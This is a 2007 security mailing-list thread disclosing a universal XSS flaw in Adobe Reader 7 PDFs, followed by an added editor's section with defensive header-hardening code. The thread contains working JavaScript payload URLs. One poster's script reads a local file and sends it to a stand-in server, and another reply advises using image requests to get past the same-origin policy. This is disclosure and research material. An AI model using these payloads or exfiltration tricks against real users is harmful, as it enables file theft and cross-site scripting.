Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
Anyone know how this affects open-source PDF viewers like gpdf or evince? As I understand this vulnerability, it's only effective against embedded PDF readers, right?

A.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
The Anarcat wrote:
> Anyone know how this affects open-source PDF viewers like gpdf or evince? As I understand this vulnerability, it's only effective against embedded PDF readers, right?

I don't know what you mean by embedded. It only affects Adobe Reader 7.

Matthew Flaschen
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
Thierry Zoller wrote:
> Dear List,
> Did anybody mention this does not work in Adobe Acrobat Reader 8?

Or KPDF... The point is that it's not the PDF executing anything, it's the Reader. Yet another reason most people shouldn't use Adobe Reader.

Matthew Flaschen
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
This is in the original advisory.
http://www.wisec.it/vulns.php?page=9

On Fri, 05/01/2007 at 15.53 +0200, Kristina Lein wrote:
> Also I have to tell that my Firefox crashed when I appended some random document.write('foobar') to the exploit. I suppose it wrote it to PDF memory?! In this case maybe we can also execute code? Scary.
>
> Tõnu

Regards
Stefano

--
...oOOo...oOOo
Stefano Di Paola
Software Security Engineer
Web: www.wisec.it
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
Dear List,

Did anybody mention this does not work in Adobe Acrobat Reader 8?

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
According to public reports, this vulnerability is addressed in Adobe Acrobat Reader 8.0.

I've actually tested it. On Acrobat Reader 8 you get a message box that says "This operation is not allowed".

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS X 10.4.8.

- Juha-Matti

Larry Seltzer [EMAIL PROTECTED] wrote:
> According to public reports, this vulnerability is addressed in Adobe Acrobat Reader 8.0.
>
> I've actually tested it. On Acrobat Reader 8 you get a message box that says "This operation is not allowed".
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED]
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
I'm trying to put together a demonstration of this vulnerability, and how it could affect corporate security; however, I'm encountering a large hangup when sending a file 'back' to the webserver. The browser same-origin policy denies me the ability to send files to a different domain, which AFAIK is necessary for an external attacker to properly exploit this vulnerability.

Here's the code I have so far, based more or less on PDP's.

Vanilla, almost PDP's (different URL, spaces removed, etc.):

file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4)alert(xhr.responseText);};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);

What I'm trying to do:

file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(xhr.responseText);xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' + xhr.responseText);xhr2.onreadystatechange = function(){alert('File Transferred!');};xhr2.send(null);}};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);

Now, one would think that the LOCAL file operating mode of IE would allow the cross-domain XHR request; however, this does not work (tested on IE 6), I think because by default IE disallows JavaScript access in the local context.

Try putting this in IE:

file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol');

and then try it in Firefox. It won't work in IE 6, but it executes just fine in Firefox.

function cXHR(){ // Grabs a legit XHR.
    try{ return new ActiveXObject('Msxml2.XMLHTTP'); }catch(e){}
    try{ return new ActiveXObject('Microsoft.XMLHTTP'); }catch(e){}
    try{ return new XMLHttpRequest(); }catch(e){}
    return null;
}
var xhr = cXHR();  // For grabbing
var xhr2 = cXHR(); // For sending
xhr.onreadystatechange = function(){
    if (xhr.readyState == 4){
        alert(xhr.responseText);
        xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' + xhr.responseText); // Send it up, yo.
        xhr2.onreadystatechange = function(){ alert('File Transferred!'); };
        xhr2.send(null);
    }
};
xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);
xhr.send(null);

Anyone's input on this matter would be appreciated.

On 1/4/07, Juha-Matti Laurio [EMAIL PROTECTED] wrote:
> Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS X 10.4.8.
>
> - Juha-Matti
>
> Larry Seltzer [EMAIL PROTECTED] wrote:
> > According to public reports, this vulnerability is addressed in Adobe Acrobat Reader 8.0.
> >
> > I've actually tested it. On Acrobat Reader 8 you get a message box that says "This operation is not allowed".
> >
> > Larry Seltzer
> > eWEEK.com Security Center Editor
> > http://security.eweek.com/
> > http://blog.eweek.com/blogs/larry%5Fseltzer/
> > Contributing Editor, PC Magazine
> > [EMAIL PROTECTED]
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
I just skimmed through your code very quickly and I noticed a single problem. Don't send the captured data with another XHR (xhr2). Use images.

var img = new Image();
img.src = url;

This should work.

On 1/4/07, T Biehn [EMAIL PROTECTED] wrote:
> I'm trying to put together a demonstration of this vulnerability, and how it could affect corporate security; however, I'm encountering a large hangup when sending a file 'back' to the webserver. The browser same-origin policy denies me the ability to send files to a different domain, which AFAIK is necessary for an external attacker to properly exploit this vulnerability.
>
> Here's the code I have so far, based more or less on PDP's.
>
> Vanilla, almost PDP's (different URL, spaces removed, etc.):
>
> file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4)alert(xhr.responseText);};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);
>
> What I'm trying to do:
>
> file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(xhr.responseText);xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' + xhr.responseText);xhr2.onreadystatechange = function(){alert('File Transferred!');};xhr2.send(null);}};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);
>
> Now, one would think that the LOCAL file operating mode of IE would allow the cross-domain XHR request; however, this does not work (tested on IE 6), I think because by default IE disallows JavaScript access in the local context.
>
> Try putting this in IE:
>
> file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol');
>
> and then try it in Firefox. It won't work in IE 6, but it executes just fine in Firefox.
>
> function cXHR(){ // Grabs a legit XHR.
>     try{ return new ActiveXObject('Msxml2.XMLHTTP'); }catch(e){}
>     try{ return new ActiveXObject('Microsoft.XMLHTTP'); }catch(e){}
>     try{ return new XMLHttpRequest(); }catch(e){}
>     return null;
> }
> var xhr = cXHR();  // For grabbing
> var xhr2 = cXHR(); // For sending
> xhr.onreadystatechange = function(){
>     if (xhr.readyState == 4){
>         alert(xhr.responseText);
>         xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' + xhr.responseText); // Send it up, yo.
>         xhr2.onreadystatechange = function(){ alert('File Transferred!'); };
>         xhr2.send(null);
>     }
> };
> xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);
> xhr.send(null);
>
> Anyone's input on this matter would be appreciated.
>
> On 1/4/07, Juha-Matti Laurio [EMAIL PROTECTED] wrote:
> > Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS X 10.4.8.
> >
> > - Juha-Matti
> >
> > Larry Seltzer [EMAIL PROTECTED] wrote:
> > > According to public reports, this vulnerability is addressed in Adobe Acrobat Reader 8.0.
> > >
> > > I've actually tested it. On Acrobat Reader 8 you get a message box that says "This operation is not allowed".
> > >
> > > Larry Seltzer
> > > eWEEK.com Security Center Editor
> > > http://security.eweek.com/
> > > http://blog.eweek.com/blogs/larry%5Fseltzer/
> > > Contributing Editor, PC Magazine
> > > [EMAIL PROTECTED]

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[Full-disclosure] Universal XSS with PDF files: highly dangerous
I will be very quick and just point to links where you can read about this issue.

It seems that PDF documents can execute JavaScript code for no apparent reason by using the following template:

http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here

You must understand that the attacker doesn't need to have write access to the specified PDF document. In order to get an XSS vector working you need to have a PDF file hosted on the target, and that's all about it. The rest is just a matter of your abilities and desires.

This finding was originally mentioned by Sven Vetsch on his blog. This is very good and quite interesting. Good work.

There is a POC I composed:

http://www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#something=javascript:function%20createXMLHttpRequest(){%20%20%20try{%20return%20new%20ActiveXObject('Msxml2.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20ActiveXObject('Microsoft.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20XMLHttpRequest();%20}catch(e){}%20%20%20return%20null;}var%20xhr%20=%20createXMLHttpRequest();xhr.onreadystatechange%20=%20function(){%20%20%20%20if%20(xhr.readyState%20==%204)%20%20%20%20%20%20%20%20alert(xhr.responseText);};xhr.open('GET',%20'http://www.google.com',%20true);xhr.send(null);

More on the matter can be found here:

http://www.gnucitizen.org/blog/danger-danger-danger/
http://www.disenchant.ch/blog/hacking-with-browser-plugins/34

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
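[Editor's note: the following is an added example and is not code from pdp or from anyone else in this thread.] The template above puts the payload after the `#`, and browsers never send the fragment to the server, so a web server cannot see or log the attack at all; what it can do is stop handing PDFs to the vulnerable in-browser plugin. The real fix is on the client (the thread reports Reader 8 refuses the operation), but for a site that cannot control its visitors' Reader version, serving every PDF with `Content-Disposition: attachment` makes the browser save the file instead of rendering it inline, which is the point at which the fragment would have been evaluated. This example audits a set of responses for PDFs served inline and produces hardened headers. It assumes Node.js-style header objects (keys compared case-insensitively); all function names and the sample responses are mine.

```javascript
// Added example (editor's code, not from the thread): detect PDFs served
// inline and rewrite their headers so the browser downloads them instead of
// rendering them in the plugin. Assumes plain header objects as used by Node.js.

// Strip query string (and a fragment, should someone paste a full URL in by
// hand; a browser never sends the "#..." part to the server).
function pathOnly(urlPath) {
  let p = urlPath;
  const h = p.indexOf('#');
  if (h !== -1) p = p.slice(0, h);
  const q = p.indexOf('?');
  if (q !== -1) p = p.slice(0, q);
  return p;
}

// Case-insensitive header lookup; returns '' when absent.
function getHeader(headers, name) {
  const want = name.toLowerCase();
  for (const k of Object.keys(headers)) {
    if (k.toLowerCase() === want) return String(headers[k]);
  }
  return '';
}

// Replace any case-variant of the header with a single lowercase key.
function setHeader(headers, name, value) {
  const want = name.toLowerCase();
  for (const k of Object.keys(headers)) {
    if (k.toLowerCase() === want) delete headers[k];
  }
  headers[want] = value;
}

// A response counts as a PDF by declared type or by file extension; the
// extension check matters because a PDF mislabelled as octet-stream is still
// opened by the plugin once the browser sniffs it.
function isPdfResponse(urlPath, headers) {
  const ct = getHeader(headers, 'content-type').split(';')[0].trim().toLowerCase();
  if (ct === 'application/pdf') return true;
  return pathOnly(urlPath).toLowerCase().endsWith('.pdf');
}

// Audit: a finding string when a PDF would be rendered inline, otherwise null.
function auditPdfResponse(urlPath, headers) {
  if (!isPdfResponse(urlPath, headers)) return null;
  const cd = getHeader(headers, 'content-disposition').trim().toLowerCase();
  if (cd.startsWith('attachment')) return null;
  return 'PDF served inline (Content-Disposition: ' + (cd || 'missing') + ') for ' + pathOnly(urlPath);
}

// Mitigation: a hardened copy of the headers; non-PDF responses pass through.
function hardenPdfHeaders(urlPath, headers) {
  const out = Object.assign({}, headers);
  if (!isPdfResponse(urlPath, headers)) return out;
  const segs = pathOnly(urlPath).split('/');
  // Keep the filename header-safe: no quotes, CR/LF or other surprises.
  let name = (segs[segs.length - 1] || 'document').replace(/[^A-Za-z0-9._-]/g, '_');
  if (!name.toLowerCase().endsWith('.pdf')) name += '.pdf';
  setHeader(out, 'Content-Type', 'application/pdf');
  // "attachment": the browser saves the file rather than handing it to the plugin.
  setHeader(out, 'Content-Disposition', 'attachment; filename="' + name + '"');
  // Don't let the browser sniff a mislabelled body into something it renders inline.
  setHeader(out, 'X-Content-Type-Options', 'nosniff');
  return out;
}

// Constructed sample responses, as an audit tool would see them.
const SAMPLE_RESPONSES = [
  { url: '/docs/manual.pdf', headers: { 'Content-Type': 'application/pdf' } },
  { url: '/download?id=42', headers: { 'content-type': 'application/pdf; charset=binary', 'content-disposition': 'inline' } },
  { url: '/report.PDF?v=2', headers: { 'content-type': 'application/octet-stream', 'content-disposition': 'attachment; filename="report.pdf"' } },
  { url: '/index.html', headers: { 'content-type': 'text/html' } },
];

function auditAll(responses) {
  return responses.map(r => auditPdfResponse(r.url, r.headers)).filter(f => f !== null);
}

// Running the audit again over hardened headers should report nothing.
function auditAfterHardening(responses) {
  return auditAll(responses.map(r => ({ url: r.url, headers: hardenPdfHeaders(r.url, r.headers) })));
}

console.log(auditAll(SAMPLE_RESPONSES));          // two findings
console.log(auditAfterHardening(SAMPLE_RESPONSES)); // []
```

Two caveats a practitioner would want: pdp's point that the attacker needs no write access to the PDF means every PDF the site hosts must get this treatment, not just the ones an application writes; and because the fragment never reaches the server, access logs will show an ordinary request for the PDF, so this cannot be detected server-side after the fact, only prevented.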
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
[EMAIL PROTECTED] wrote:
> Sorry about that but that's wrong. All the credits have to go to Stefano Di Paola and Giorgio Fedon. They presented that stuff at the 23C3 in Berlin.

The original paper is located here: http://events.ccc.de/congress/2006/Fahrplan/events/1602.en.html

Probably Stefano and Giorgio will post something on their site http://www.wisec.it/ (!hey i'm waiting too stefano : D)

The technique exposed is really really neat, but was only one of the things presented at CCC in that talk (UXSS was used as an attack vector to inject JS to wrap/tamper XMLHttpRequest, and if the user had a proxy on his side, HTTP response splitting was used in conjunction with some keepalive bugs to tilt the browser cache and cause cross-domain scripting; all this was auto-injecting). Yeah, it needs some conditions (a proxy with keepalive), but this is a bomb itself : )

From the PDF: Ajax Security, Universal Cross Site Scripting, Code Injection, Cache Poisoning, Prototype Hijacking, Auto Injecting Cross Domain Scripting

Anyway, I expect to see something like an advisory/paper posted somewhere soon from the wisec staff, because it's obvious that the CCC PDF isn't enough to metabolize all that stuff.

Regards,
Francesco 'ascii' Ongaro
http://www.ush.it/

ps: flash 8 is fixed : )